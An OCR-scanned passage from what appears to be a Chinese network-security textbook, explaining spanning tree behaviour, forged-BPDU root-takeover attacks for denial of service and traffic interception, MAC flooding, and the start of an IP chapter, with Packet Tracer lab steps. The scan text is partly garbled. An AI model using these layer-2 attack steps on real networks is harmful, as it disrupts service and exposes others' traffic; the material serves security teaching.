依次 查看 三 台 交 换 机 的 生成 树 信 息 ,结果 如 图 2-45 和 图 2-46 所 示 。 通 过 SW1 的 结 
果 可 知 生成 树 的 根 结 点 没有 变化 ,仍然 是 SW3, 但 SW1 的 Fa0/3 端口 由 desg port 变 为 
root port。SW2 的 Fa0/3 端口 由 阻塞 状态 变 为 指定 端口 , 即 重新 处 于 连通 状态 。 
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Switch#show spanning-tree 
|VLAN0001 
Spanning tree enabled protocol ieee 
RootID Priority 32769 
Address 0001.4330.6BB6 
Cost 19 
Port 3(FastEthernet0/3) 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) 
Address 0001.C931.8BE2 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Aging Time 20 


linterface RoleSts Cost Prio.Nbr Type 


Fa0/1 Desg FWD 19 128.1 P2p 
IEa0/3 Root FWD 19 128.3 P2p 


图 2-45 ”SWI1 的 生成 树 信息 


Switch#show spanning-tree 
VLAN0001 
Spanning tree enabled protocol ieee 
RootID Priority 32769 
Address 0001.4330.6BB6 
Cost 19 
Port 2(FastEthemet0/2) 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) 
Address 00D0.D39C.0192 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Aging Time 20 


Interface RoleStsCost Prio.Nbr Type 


Fa0/1 Desg FWD 19 128.1 P2p 
Fa0/2 Root FWD 19 128.2 P2p 
Fa0/3 Desg FWD 19 128.3 P2p 


图 2-46 SW2 的 生成 树 信息 


2.5 生成 树 攻击 


生成 树 攻击 是 指 攻击 者 通过 发 布 伪造 的 BPDU 数据 报 来 调整 网 络 的 拓扑 结构 ,进而 
达到 拒绝 服务 攻击 .数据 监听 等 攻击 目的 。 


251 利用 生成 树 攻 击 达 到 使 网 络 拓扑 不 稳定 和 拒绝 服务 的 
攻击 效果 


攻击 者 连续 不 断 地 、 交 蔡 发 送 伪造 的 高 、 低 优先 级 BPDU 数据 报 ,使 得 网 络 中 的 交换 
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机 忙于 计算 生成 树 , 无 法 提供 正常 的 数据 转发 服务 ,进而 达到 拒绝 服务 攻击 的 效果 。 伪 造 
的 高 优先 级 BPDU 报 文 用 于 抢占 根 结 点 , 低 优先 级 报 文 用 于 释放 根 结 点 ,这 两 类 报 文 除 
了 会 使 交换 机 忙于 计算 生成 树 ,还 会 导致 网 络 拓扑 结构 不 断 变化 ` 处 于 不 稳定 的 状态 。 

图 2-47 是 抢占 根 结 点 的 示意 图 。 黑 客 在 网 络 中 发 布 伪造 的 BPDU 报 文 ,声明 自己 的 
优先 级 为 4096, 这 个 优先 级 高 于 网 络 中 其 他 三 台 交 换 机 的 默认 优先 级 32 768 ,因此 从 
SW3 手中 夺 过 根 身份 ,成 为 新 的 根 结 点 。 

由 于 根 结 点 发 生 了 变化 ,三 台 交换 机 开始 计算 新 的 生成 树 。 首 先 每 台 交 换 机 ( 根 结 点 
除外 ) 确 定 自 己 的 根 端口 (root port)。 根 端口 是 具有 到 根 结 点 最 小 路 径 花 费 的 端口 。 
图 2-47 中 三 条 物理 链 路 都 是 100Mb/s 链 路 ,因此 代价 都 是 19。SW1 的 1 端口 到 根 结 点 
的 花费 为 19,2 端口 到 根 结 点 的 花费 为 76,3 端口 到 根 结 点 的 花费 也 为 76, 因 此 端口 1 为 
SW1 的 根 端口 。SW2 的 2 端口 到 根 结 点 的 花费 为 57,3 端口 到 根 结 点 的 花费 为 38, 因 此 
SW2 的 根 端口 为 3 号 端口 。SW3 的 2 端口 到 根 结 点 的 花费 为 38,3 端口 到 根 结 点 的 花费 
为 57, 因 此 SW3 的 根 端口 为 2 号 端口 。 


192.168.0.3 三] 
C0-C0-C0-C0-C0-00 全 


Priority:32 768 
MAC:0001.4330.6BB6 
desg port 


i 


blocking port 


Priority:32 768 
MAC:0001.C931.8BE2 SWI 


全 二 全 二 二 3 3 
root port Ek -人 
desg port 
Priority:4096 黑 root port 各 192.168.0.2 
MAC:00-50-0F-82-2C-0A G3 B0-B0-B0-B0-B0-B0 
黑客 主机 2 
root 


图 2-47 抢占 根 结 点 


Priority:32 768 
SW2 MAC:00D0.D39C.0192 


下 面 为 每 条 物理 链 路 确定 一 台 指 定 交 换 机 ,然后 确定 指定 端口 (desg port) 。 指 定 的 
交换 机 到 根 结 点 的 路 径 花 费 最 小 。 对 于 SW1 一 SW3 链 路 ,SW1 到 根 结 点 的 路 径 花费 为 
19,SW3 到 根 结 点 的 花费 为 38,SW1 为 指定 交换 机 ,因此 SW1 的 2 号 端口 为 指定 端口 。 
对 于 SW2 一 SW3 链 路 ,因为 SW2 和 SW3 到 根 结 点 的 路 径 花 费 都 是 38,SW3 的 ID 较 小 ， 
因此 它 成 为 指定 交换 机 ,SW3 的 3 号 端口 成 为 指定 端口 。 对 于 SW1 一 SW2 链 路 ,显然 
SW1 是 指定 交换 机 ,因此 SW1 的 3 号 端口 成 为 指定 端口 。 

最 后 标记 根 端口 和 指定 端口 为 转发 端口 (forwording port) ,其 余 的 作为 阻塞 端口 
(blocking port) 。SW2 的 2 号 端口 被 标记 为 阻塞 端口 ,该 端口 不 收发 数据 包 。 至 此 网 络 
拓扑 结构 发 生 了 变化 ,同时 计算 生成 树 也 消耗 了 三 台 交换 机 的 资源 。 
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图 2-48 是 释放 根 结 点 的 示意 图 。 黑 客 在 网 络 中 发 布 伪造 的 BPDU 报 文 ,声明 自己 的 
优先 级 为 53 248 ,这 个 优先 级 低 于 网 络 中 其 他 三 台 交换 机 的 默认 优先 级 32 768 ,因此 SW3 
重新 夺 过 根 身份 ,成 为 新 的 根 结 点 。 


192.168.0.3 面 | 
C0-C0-C0-C0-C0-C0 7 


Priority:32 768 
MAC:0001.4330.6BB6 


desg port — 一 -一 desgport 
po So 
ee 2 2 pa a 
Priority:32 768 pi 余 emg Priority:32 768 
MAC:0001.C931.8BE2 SW]1 A 1 ESW2 MAC:00D0.D39C.0192 
3 


desg port 


Priority:53 248 于 bot 记 192.168.0.2 
MAC:00-50-0F-82-2C-0A 未 [L B0-B0-B0-B0-B0-B0 
图 2-48 释放 根 结 点 


由 于 根 结 点 发 生 了 变化 ,三 台 交 换 机 开始 计算 新 的 生成 树 。 首 先 每 台 交 换 机 ( 根 结 点 
除外 ?确定 自己 的 根 端口 (root port) 。SW1 的 2 端口 到 根 结 点 的 花费 为 19 ,3 端口 到 根 结 
点 的 花费 为 38 ,因此 端口 2 为 SW1 的 根 端口 。 同 样 ,SW2 的 根 端 口 为 2 号 端口 。 

下 面 为 每 条 物理 链 路 确定 一 台 指 定 交 换 机 ,然后 确定 指定 端口 (desg port) 。 指 定 的 
交换 机 到 根 结 点 的 路 径 花 费 最 小 。 对 于 SW1 一 SW3 链 路 ,显然 SW3 为 指定 交换 机 ,因此 
SW3 的 2 号 端口 为 指定 端口 。 对 于 SW2 一 SW3 链 路 ,也 是 SW3 为 指定 交换 机 ,SW3 的 
3 号 端口 为 指定 端口 。 对 于 SW1 一 SW2 链 路 ,因为 SW1 和 SW2 到 根 结 点 的 花费 都 是 
19, 这 时 ID 号 较 小 的 SW1 成 为 指定 交换 机 ,因此 SW1 的 3 号 端口 成 为 指定 端口 。 

最 后 标记 根 端口 和 指定 端口 为 转发 端口 (forwording port) ,其 余 的 作为 阻塞 端口 
(blocking port)。SW2 的 3 号 端口 被 标记 为 阻塞 端口 ,该 端口 不 收发 数据 包 。 至 此 网 络 
拓扑 结构 又 恢复 到 正常 的 状态 。 黑 客 以 2s 为 间隔 交替 发 送 伪造 的 高 . 低 优先 级 BPDU 
数据 报 ,使 得 三 台 交 换 机 忙于 计算 生成 树 ,影响 正常 的 通信 转发 工作 ,同时 网 络 拓扑 结构 
不 断 调整 ,始终 处 于 不 稳定 的 状态 。 


252 测试 生成 树 攻击 


训练 : 利用 Cisco 模拟 器 组 建 如 图 2-47 所 示 的 网 络 ,模拟 生成 树 攻击 。 

第 一 步 : 利用 Cisco 模拟 器 组 建 网 络 。 

利用 Cisco 模拟 器 按照 图 2-47 组 建 网 络 ,添加 三 台 2960 交换 机 ,使 用 三 根 网 线 将 三 
台 交 换 机 连接 起 来 , 按 如 图 2-47 所 示 的 情况 确定 连接 端口 。 在 SW1 的 1 号 端口 连接 一 
台 2960 交换 机 (用 来 模拟 黑客 ) .组建 好 的 网 络 如 图 2-49 所 示 。 
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Logical [Root] New Cluster Move Object Set Tiled Background 


Seryger-pT 
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Ps Fan/2 
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图 2-49 网 络 拓扑 


第 二 步 : 查看 hacker 的 生成 树 信 息 。 
hacker 的 生成 树 信息 如 图 2-50 所 示 ,由 于 hacker 与 当前 根 结 点 SW3 的 优先 级 相同 ,但 
MAC 地 址 小 于 SW3 的 MAC, 因 此 根 结 点 仍然 是 SW3, 这 时 生成 树 结构 没有 发 生 改 变 。 


Switch#show spanning-tree 一 一 查看 生成 树 
VLAN0001 

Spanning tree enabled protocol ieee 

Root ID Priority 32769 一 一 根 结 点 的 优先 级 为 32 768 


Address ”0001.4330.6BB6 一 一 根 结 点 的 IEAC 地 址 
机 各 Cost 19 
Port 1(FastEthernet0/1) 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Bridge ID Priority 32769 (priority 32768 sys-id-ext 1) 一 hacker 的 优先 级 
ae Address ”0050.0F82.2C0A 一 一 hacker 的 EAC 地 址 
信息 Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Asing Time 20 


Interface RoleStsCost Prio.Nbr Type 


Fa0/1 Root FWD 19 128.1 P2p 


图 2-50 hacker 的 生成 树 信息 


第 三 步 : hacker 发 布 伪造 的 高 优先 级 BPDU 报 文 来 抢占 生成 树 。 
hacker 发 布 伪造 的 高 优先 级 报 文 来 抢占 根 结 点 ,这 里 通过 将 hacker 的 优先 级 改 为 
4096 来 实现 ,如 图 2-51 所 示 。 


witch>en 
witch#configure terminal 

nter configuration commands, one per line. End with CNTL/Z. 
witch(config)#spanning-tree vlan 1 priority 4096 
witch(config)# 


图 2-51 修改 hacker 的 优先 级 为 4096 
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第 四 步 : 查看 hacker 的 生成 树 信 息 。 
通过 图 2-52 可 见 由 于 hacker 的 优先 级 高 于 其 他 交换 机 ,因此 它 抢 占 了 根 结 点 。 此 
时 整个 网 络 的 拓扑 结构 发 生 了 改变 。 三 台 交 换 机 计算 生成 树 消耗 了 大 量 的 资源 。 


Switch#show spanning-tree 一 一 获得 配置 权限 
VLAN0001 


Spanning tree enabled protocol ieee 
根 结 点 的 优先 级 为 4096 


nm RootID Priority 4097 
根 结 点 Address ”0050.0F82.2C0A 一 一 根 结 点 的 IAC 地 址 


This bridge is the root 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Bridge ID Priority 4097 (priority 4096 sys-id-ext 1) 一 — hacker 的 优先 级 
{ Address 0050.0F82.2C0A hacker 的 HAC 地 址 


Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Asing Time 20 


Interface ”Role Sts Cost ”PrioNbr Type 


Fa0/l Desg FWD 19 128.1 P2p 
图 2-52 hacker 抢占 根 结 点 


第 五 步 : 黑客 通过 发 布 低 优先 级 BPDU 报 文 来 释放 根 结 点 。 
hacker 发 布 伪造 的 低 优 先 级 报 文 来 释放 根 结 点 ,这 里 通过 将 hacker 的 优先 级 改 为 


53 248 来 实现 ,如 图 2-53 所 示 。 
Witch#configure terminal 
ine. End with CNTL/Z. 


[Enter configuration commands, onep' 


图 2-53 ”修改 hacker 的 优先 级 为 53 248 


第 六 步 : 查看 hacker 的 生成 树 信息 ,如 图 2-54 所 示 。 


Switch#show spanning-tree 一 一 坦 看 生 质 柯 


VLAN0001 
Spanning tree enabled protocol ieee 
RootID Priority 32769 一 一 根 结 点 的 优先 级 为 32 768 


Address 
此 入 Cost 19 
Port 1(FastEthernet0/1) 


Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Bridge ID Priority 53249 (priority 53248 sys-id-ext 1) 一 hacker 的 优先 级 
{ Address 0050.0F82.2C0A hacker 的 IEAC 地 址 


Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Aging Time 20 


Jntetface RoleStsCost Prio.Nbr Type 


Fa0/1 Root FWD 19 128.1 P2p 
图 2-54 hacker 释放 根 结 点 


通过 图 2-54 可 见 ,由 于 hacker 的 优先 级 低 于 其 他 交换 机 ， enter ee 
SW3 重新 获得 根 身份 。 此 时 整个 网 络 的 拓扑 结构 发 生 了 改变 ,还 原 回 之 前 的 状态 。 之 
hacker 交替 发 送 高 、 低 优先 级 BPDU 报 文 , 使 得 网 络 的 拓扑 结构 始终 era 
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且 三 台 交 换 机 计算 生成 树 消耗 了 大 量 的 资源 ,达到 拒绝 服务 攻击 的 效果 。 


253 利用 生成 树 攻击 实施 数据 监听 


首先 黑客 将 自己 的 主机 与 网 络 中 的 两 台 交 换 机 物理 连接 , 即 在 物理 拓扑 结构 上 构成 
一 个 环 路 ,但 由 于 生成 树 的 作用 ,此 时 逻辑 拓扑 是 非 闭合 的 ,网 络 数据 并 不 会 经 过 黑客 主 
机 中 转 。 之 后 黑客 通过 发 布 伪造 的 高 优先 级 BPDU 报 文 从 当前 合法 根 结 点 手中 夺取 根 
身份 ,进而 改变 网 络 数据 的 传输 流向 ,使 得 网 络 数据 经 过 黑客 主机 中 转 。 下 面 举例 说 明 这 
种 攻击 方式 。 

在 如 图 2-55 所 示 的 网 络 中 黑客 主机 上 安装 了 两 块 网 卡 ,其 中 一 块 网 卡 连 接 到 SW1 
的 1 号 端口 , 男 一 块 网 卡 连接 到 SW2 的 4 号 端口 。 此 时 黑客 不 打算 开始 攻击 ,因此 将 自 
己 的 优先 级 设置 为 较 低 值 53 248 ,由 于 Cisco 交换 机 的 默认 优先 级 为 32 768 ,这 个 优先 级 
不 会 使 黑客 主机 获得 网 络 的 根 身份 。 

这 时 虽然 在 物理 结构 上 黑客 主机 将 自己 作为 一 个 环 路 的 中 转 点 接 入 到 网 络 中 ,但 由 
于 生成 树 机 制 的 作用 ,黑客 主机 的 两 个 端口 中 一 个 作为 root port 处 于 转发 状态 , 另 一 个 
作为 blocking port 处 于 阻塞 状态 。 这 相当 于 在 逻辑 上 将 环 路 去 除 ,黑客 主机 成 为 一 个 孤 
立 结 点 ,网 络 数据 不 会 经 过 它 中 转 ,黑客 主机 也 就 无 法 截获 当前 的 通信 数据 。SW3 作为 
网 络 的 桥梁 担负 起 数据 中 转 任务 ,如 图 2-55 所 示 。 


Priority:32 768 
MAC:0001.4330.6BB6 


SW3 root 


Priority:32 768 
MAC:00D0.D39C.0192 


desg port 
“一 一 一 阻 断 端口 
MACOO SOOR E22C.0A root pont Me Blocking port 
和 加 例 说 明 
图 2-55 未 进行 攻击 时 的 数据 流向 
当 黑 客 打算 开始 攻击 时 ,他 会 将 黑客 主机 的 优先 级 设置 为 4096, 由 于 交换 机 的 优先 


级 要 求 是 4096 的 整数 倍 , 因 此 这 个 数值 一 定 会 高 于 当前 根 结 点 的 优先 级 ,这 样 黑客 主机 
会 顺利 地 夺取 根 身份 。 

当 根 结 点 发 生变 化 之 后 ,网 络 中 的 所 有 交换 机 都 会 重新 计算 生成 树 , 即 更 新 各 个 端口 
的 状态 。 如 图 2-56 所 示 ,SW3 的 3 号 端口 由 连通 状态 变 为 阻塞 状态 ,黑客 主机 之 前 阻塞 
的 端口 变 为 连通 状态 。 当 生成 树 稳定 之 后 ,黑客 主机 成 为 网 络 新 的 中 转 点 ,可 以 对 网 络 通 
信 实 施 监听 。 

黑客 将 优先 级 设置 为 53 248 就 可 以 恢复 网 络 的 拓扑 结构 、 停 止 监听 ,设置 为 4096 就 
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可 以 改变 网 络 拓扑 、 实 施 监 听 。 这 种 攻击 方式 虽然 灵活 ,但 要 求 黑客 主机 能 够 物理 连接 两 
台 交 换 机 ,这 增加 了 实际 操作 的 难度 。 


Priority:32 768 
MAC:0001.4330.6BB6 


Priority:32 768 
MAC:00D0.D39C.0192 


root port 
。 一 一 一 一 阻 断 端口 
Priority:4096 个- 一 一 一 数据 流向 
MAC:0050.0F82.2COA 


图 例 说 明 
图 2-56 攻击 实施 之 后 的 数据 流向 


254 模拟 利用 生成 树 攻击 实施 的 数据 监听 
训练 : 利用 Cisco 模拟 器 组 建 如 图 2-55 所 示 的 网 络 ,模拟 利用 生成 树 攻击 实施 的 数 


据 监听 。 
第 一 步 : 利用 Cisco 模拟 器 组 建 网 络 。 
利用 Cisco 模拟 器 按照 图 2-55 组 建 网 络 ,添加 4 台 2960 交换 机 ,使 用 三 根 网 线 将 SW1、 


SW2、SW3 连接 起 来 , 按 如 图 2-55 所 示 的 情况 确定 连接 端口 。hacker 用 来 模拟 黑客 主机 ， 

SW1 的 1 号 端口 连接 hacker 的 1 号 端口 ,SW2 的 4 号 端口 连接 hacker 的 2 号 端口 。 
添加 两 台 主 机 PCO 和 PC1 ,配置 PCO 的 IP 地 址 为 192. 168. 0. 1,MAC 地 址 为 A0- 

A0-A0-A0-A0-A0;PC1l 的 IP 地 址 为 192. 168. 0.2,MAC 地 址 为 B0-B0-B0-B0-B0-B0。 
组 建 好 的 网 络 拓扑 如 图 2-57 所 示 。 


2960-24TT 
Switch3 


PC-PT Switchl 


2960-24TT 也 


Switch2 PC-PT 


2960-24TT 
hacker 


图 2-57 网 络 拓扑 
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第 二 步 : 调 低 hacker 的 优先 级 不 抢占 根 结 点 。 


调 低 hacker 的 优先 级 不 抢占 根 结 点 ,这 里 通过 将 hacker 的 优先 级 改 为 53 248 来 实 


现 , 如 图 2-58 所 示 。 


nter confisuration conumands., one per line End with CNTLZ 


Er er terminal 
witch(confie)=spanning-tree vlan 1 priority S3248 


图 2-58 修改 hacker 的 优先 级 为 53 248 


第 三 步 : 查看 hacker 的 生成 树 信 息 。 


如 图 2-59 所 示 ,可 见 当前 的 根 结 点 仍 为 SW3。hacker 的 优先 级 为 53 248,hacker 的 
1 号 端口 是 root port, 处 于 转发 数据 状态 ,2 号 端口 处 于 阻塞 状态 ,不 转发 数据 。 此 时 


hacker 不 会 中 转 网 络 数据 。 


Switch#show spanning-tree 一 一 查看 生成 树 
VLAN0001 
Spanning tree enabled protocol ieee 
RootID Priority 32769 一 一 根 结 点 的 优先 级 为 32 768 
Address ”0001.4330.6BB6 一 一 根 结 点 的 IAC 地 址 
信息 Cost 19 
Port 1(FastEthernet0/1) 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Bridge ID Priority 53249 (priority 53248 sys-id-ext 1) 一 hacker 的 优先 级 
Address ”0050.0F82.2C0A 一 一 hacker 的 WAC 地 址 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Aging Time 20 


Interface RoleStsCost Prio.Nbr Type 


BLK port -一 Fa0/2 Altn BLK 19 128.2 P2p 


root port 一 Fa0/l Root FWD 19 128.1 P2p 


图 2-59 hacker 的 生成 树 信 息 


此 时 的 网 络 拓扑 如 图 2-60 所 示 ,SW3 是 通信 的 中 转 点 。 


2960-24TT 
Switch3 


2960-24TT 及 


Switch2 PC-PT 


2960-24TT 
PC-PT Switchl 
PC0 


卓 赛 


2960-24TT 
hacker 


图 2-60 ”SW3 是 通信 的 中 转 点 
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第 四 步 : 测试 此 时 的 数据 流向 。 

在 4 台 交 换 机 上 执行 clear mac-address-table dynamic ,清空 它们 的 MAC 地 址 表 , 然 
后 在 PCO 上 执行 ping 192. 168. 0. 2 命令 ,由 于 PCO 和 PC1 之 间 传 输 的 数据 将 经 过 SW3 
中 转 , 因 此 在 SW3 的 MAC 表 中 会 记录 下 两 台 主机 的 MAC 地 址 和 端口 的 映射 关系 。 而 
hacker 中 只 会 记录 PC0 的 MAC 地 址 ,没有 PC1 的 MAC 地 址 ,这 些 说 明 数 据 是 经 过 
SW3 中 转 传输 的 。SW3 和 hacker 的 MAC 地 址 表 分 别 如 图 2-61 和 图 2-62 所 示 。 


Switch#show mac-address-table 
Mac Address Table 


Vlan MacAddress Type Ports 


0005.5ebda302 DYNAMIC Fa0/2 

00e0.a351.8702 DYNAMIC Fa0/3 

a0a0.a0a0.a0a0 DYNAMIC Fa0/2 一 一 PC0 的 IAC 地 址 
b0b0.b0b0.b0b0 DYNAMIC Fa0/3 一 一 PC1 的 1AC 地 址 


图 2-61 SW3 的 MAC 地 址 表 
Switch#show mac-address-table 


Mac Address Table 


Vlan Mac Address Type Ports 


1 0005.5ebd.a301 DYNAMIC Fa0/l 
1 a0a0.a0a0.a0a0 DYNAMIC Fa0/1 一 一 PC0 的 WAC 地 址 


图 2-62 hacker 的 MAC 地 址 表 


第 五 步 : 调 高 hacker 的 优先 级 来 抢占 根 身份 。 
调 高 hacker 的 优先 级 来 抢占 根 身 份 ,这 里 通过 将 hacker 的 优先 级 改 为 4096 来 实现 ， 
如 图 2-63 所 示 。 


图 2-63 ”修改 hacker 的 优先 级 为 4096 


第 六 步 : 查看 hacker 的 生成 树 信 息 。 

从 图 2-64 可 见 ,此 时 hacker 成 为 根 结 点 , 它 的 两 个 端口 都 变 为 desg port, 处 于 转发 
状态 ,至 此 hacker 成 为 网 络 通信 的 中 转 站 , 它 可 以 对 通信 数据 实施 监听 。 

生成 树 攻击 成 功 之 后 的 网 络 拓扑 如 图 2-65 所 示 ,hacker 成 为 通信 的 中 转 点 。 

第 七 步 : 测试 此 时 的 数据 流向 。 

在 4 台 交 换 机 上 执行 clear mac-address-table dynamic 清空 它们 的 MAC 地 址 表 , 然 
后 在 PCO 上 执行 ping 192. 168. 0. 2 命令 ,由 于 PC0 和 PC1 之 间 传 输 的 数据 将 经 过 
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Switch#show spanning-tree 一 一 查看 生成 村 
VLAN0001 
Spanning tree enabled protocol ieee 
二 点 RootID Priority 4097 一 一 根 结 点 的 优先 级 为 4096 
机 名 Address ”0050.0F82.2C0A 一 一 根 结 点 的 EAC 地 址 
This bridge is the root 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 


Bridge ID Priority 4097 (priority 4096 sys-id-ext 1) 一 hacker 的 优先 级 
Address ”0050.0F82.2C0A hacker 的 HAC 地 址 
Hello Time 2 sec Max Age 20 sec Forward Delay 15 sec 
Aging Time 20 


Interface Role Sts Cost Prio.Nbr Type 


desg port — Fa0/2 DesgLSN 19 128.2 P2p 
desg port 一 一 Fa0/1 Desg FWD 19 128.1 P2p 


图 2-64 ”hacker 的 生成 树 信 息 


2960-24TT 
Switch3 


2960-24TT pm 


PC-PT Switchl Switch2 PC-PT 


2960-24TT 
hacker 


图 2-65 ”hacker 成 为 通信 的 中 转 点 


hacker 中 转 , 因 此 在 hacker 的 MAC 表 中 会 记录 下 两 台 主机 的 MAC 地 址 和 端口 的 映射 
关系 。 而 SW3 中 只 会 记录 PC0 的 MAC 地 址 ,没有 PC1 的 MAC 地 址 ,这 些 说 明 数 据 是 
经 过 hacker 中 转 传输 的 。 

hacker 和 SW3 的 MAC 地 址 表 如 图 2-66 和 图 2-67 所 示 。 


Switch#show mac-address-table 
Mac Address Table 


Vlan MacAddress ”Type Ports 


1 0005.5ebd.a301 DYNAMIC Fa0/l 
1 O00e0.a351.8704 DYNAMIC Fa0/2 
1 a0a0.a0a0.a0a0 DYNAMIC Fa0/1 一 一 PC0 的 映射 记录 
1 b0b0.b0b0.b0b0 DYNAMIC Fa0/2 一 一 _PC1 的 映射 记录 | 


图 2-66 hacker 的 MAC 地 址 表 
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Switch#show mac-address-table 
Mac Address Table 


Vlan Mac Address Type Ports 


1 0005.5ebd.a302 DYNAMIC Fa0/2 
1 a0a0.a0a0.a0a0 DYNAMIC Fa0/2 一 PC0 的 映射 记录 


图 2-67 SW3 的 MAC 地 址 表 


2 MAC 地 址 攻击 


MAC 地 址 表 存 储 在 交换 机 的 内 存 中 ,交换 机 的 内 存 空 间 有 限 ,只 能 存储 有 限 个 数 的 
转换 记录 ,黑客 正 是 利用 这 一 特性 来 实施 MAC 地 址 攻击 。 

MAC 地 址 攻击 是 指 攻击 者 发 送 大 量 随机 源 MAC 地 址 的 报 文 ,如 图 2-68 所 示 。 导 
致 交换 机 的 地 址 转换 表 被 大 量 无 用 的 转换 记录 占 满 ,交换 机 无 法 学 习 有 效 的 地 址 信息 ;使 
得 单 播 包 在 交换 机 内 部 也 变 成 广播 包 , 向 所 有 端口 转发 ,每 个 连 在 端口 上 的 客户 端 都 可 
以 收 到 该 报 文 ;交换 机 变 成 了 一 台 集 线 器 ,用 户 的 信息 传输 也 没有 安全 保障 了 。 


破坏 的 MAC 地 址 转换 表 
A0-A0-A0-A0-A0-A0 <-> 1 交换 机 MAC 地 址 表 空 间 很 快 
D0-D0-D0-D0-D0-D0 <-> 1 | 一 --- 占 满 。 没有 空间 学 习 合 法 的 
E0-E0-E0-E0-E0-E0 <-> 1 MACB, MACC 
192.168.0.1 192.168.0.3 
A0-A0-A0-A0-A0-A0 C0-C0-C0-C0-C0-C0 
C<-B BS -ee 
hacker | 3 CC > 主机 C 


人 2 


人 
| B->C 
每 秒 发 送 成 千 上 万 个 
EMAC 192.168.0.2 
B0-B0-B0-B0-B0-B0 
主机 B 


图 2-68 MAC 地 址 攻击 


图 2-68 说 明了 MAC 地 址 攻击 ,hacker 每 秒 发 送 成 千 上 万 个 数据 包 , 这 些 报 文 的 源 
MAC 地 址 是 随机 选取 的 ,这 导致 交换 机 在 1 号 端口 学 习 到 大 量 无 用 的 地 址 转换 记录 ,地 
址 表 很 快 被 占 满 ,没有 空间 学 习 主 机 B 和 C 的 MAC 地 址 。 当 主机 B 发 给 主机 C 的 数据 
流量 到 达 交 换 机 之 后 ,由 于 MAC 地 址 表 中 没有 主机 C 的 MAC 地 址 ,因此 交换 机 将 流量 
在 所 有 端口 转发 ,hacker 也 会 获得 这 些 数据 ,进而 从 中 提取 出 敏感 信息 。 
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1. 数据 链 路 层 中 的 协议 字段 起 什么 作用 ? 

2. 交换 机 在 刚 接 通电 源 时 如 何 工作 ? 

3. 交换 机 与 集线器 有 什么 区 别 ? 

4. 能 否 在 交换 机 的 MAC 地 址 转换 表 中 任意 添加 一 条 映射 记录 ? 如 何 实现 ? 

5. 既然 交换 机 是 在 特定 端口 转发 通信 数据 的 单 播 设备 ,为 什么 有 时 你 的 主机 可 以 捕 
获 其 他 主机 之 间 的 通信 数据 ? 

6. 交换 机 的 地 址 学 习 机 制 存 在 哪些 安全 隐患 ? 

7. 交换 机 为 什么 要 使 用 生成 树 机 制 ? 

8. 如 何 预防 交换 机 的 MAC 地 址 攻击 ? 
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IP 协议 及 其 安全 问题 


oll | IP 地 址 


IP 地 址 是 一 个 32 位 的 二 进 制 地 址 , 它 用 来 唯一 地 在 全 世界 范围 内 标识 一 台 主 机 或 
一 台 路 由 器 。 因 特 网 上 的 两 台 设 备 不 会 有 相同 的 IP 地 址 ,但 一 台 设 备 如 果 有 多 个 网 络 接 
口 ,那么 它 可 以 有 多 个 IP 地 址 。 

因为 一 个 IP 地址 有 32 位 ,因此 总 的 IP 地 址 数量 为 22 , 即 4294967 296 个 。 


人 轧 IP 协议 


在 TCP/IP 协议 得 中 ,网 络 层 包 括 5 个 协议 : 地 址 解析 协议 (Address Resolution 
Protocol, ARP) 反 向 地 址 解析 协议 (Reverse Address Resolution Protocol,RARP) 、 因 特 
网 协议 (Internet Protocol, IP) .因特网 控制 报 文 协议 (Internet Control Message Protocol， 
ICMP) 和 因特网 群 组 管理 协议 (Internet Group Management Protocol,IGMP) ,如 图 3-1 
所 示 。 


应 用 层 |ISMTP|| FTP ||TFTP|| DNS|ISNMP| … |HTTP 
传输 层 SCTP TCP UDP 
IGMPIICMP| 
网 络 层 
ARPlIRARP 
数据 链 路 层 
低层 LAN 技 术 
物理 层 


图 3-1 TCP/IP 层次 结构 


网 络 层 的 主要 协议 是 IP 协议 ,IP 协议 的 主要 职责 是 在 全 网 范围 内 将 IP 数据 报 从 源 
主机 送 达 目的 主机 ,然而 IP 也 需要 其 他 协议 所 提供 的 服务 。 

在 IP 数据 报 的 传递 过 程 中 ,IP 协议 需要 ARP 确定 下 一 跳 路 由 器 的 MAC 地 址 ,同时 
需要 ICMP 来 处 理 传 输 过 程 中 出 现 的 差错 等 异常 情况 。 
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FE 和 攻 ，3 得 


IP 协议 用 于 单 播 通信 , 即 将 数据 报 从 一 个 信 源 端 传递 到 一 个 信 宿 端 。 而 因特网 上 的 
许多 应 用 (例如 视频 直播 ) 需 要 多 播 传递 ,即将 数据 报 从 一 个 信 源 端 传递 到 多 个 信 宿 端 。 
这 时 IP 协议 需要 借助 IGMP 完成 多 播 任务 。 首 先 学 习 IP 数据 报 的 格式 。 


321 IP 数 据 报 格式 


IP 层 的 分 组 被 称 为 IP 数据 报 ,图 3-2 说 明了 IP 数据 报 的 格式 。IP 数据 报 由 两 部 分 
组 成 : 首部 和 数据 。 首 部 长 度 为 20 一 60 字 节 , 它 包 含 进行 路 由 选择 和 报 文 传递 所 必需 的 
信息 。 


20-60 字 节 


标识 际 志 A 偏 移 
16 位 3 位 13 位 
生存 时 间 协议 校 验 和 
8 位 8 位 16 位 
源 耳 地 址 
目的 IP 地 址 
选项 


图 3-2 ”IP 数据 报 格式 


图 3-3 给 出 的 是 使 用 Sniffer 捕获 的 一 个 数据 帧 ,前 14 个 字 节 为 数据 链 路 层 数据 ,其 

后 20 字 节 ( 带 阴 影 部 分 ) 为 网 络 层 数据 ( 即 IP 首部 ), 最 后 28 字 节 为 传输 层 数据 (这 里 是 
TCP)。 下 面 通过 这 个 数据 帧 具体 学 习 IP 首部 的 每 个 字段 的 含义 。 

Total LEN=48 Flag=010 offset=0 VER=4 HLEN220 


TTL=128 ” 校 验 和 


ID=15186 


ff 四 ， 04 23 00 00 02 04|05 b4 01 01|04 02 
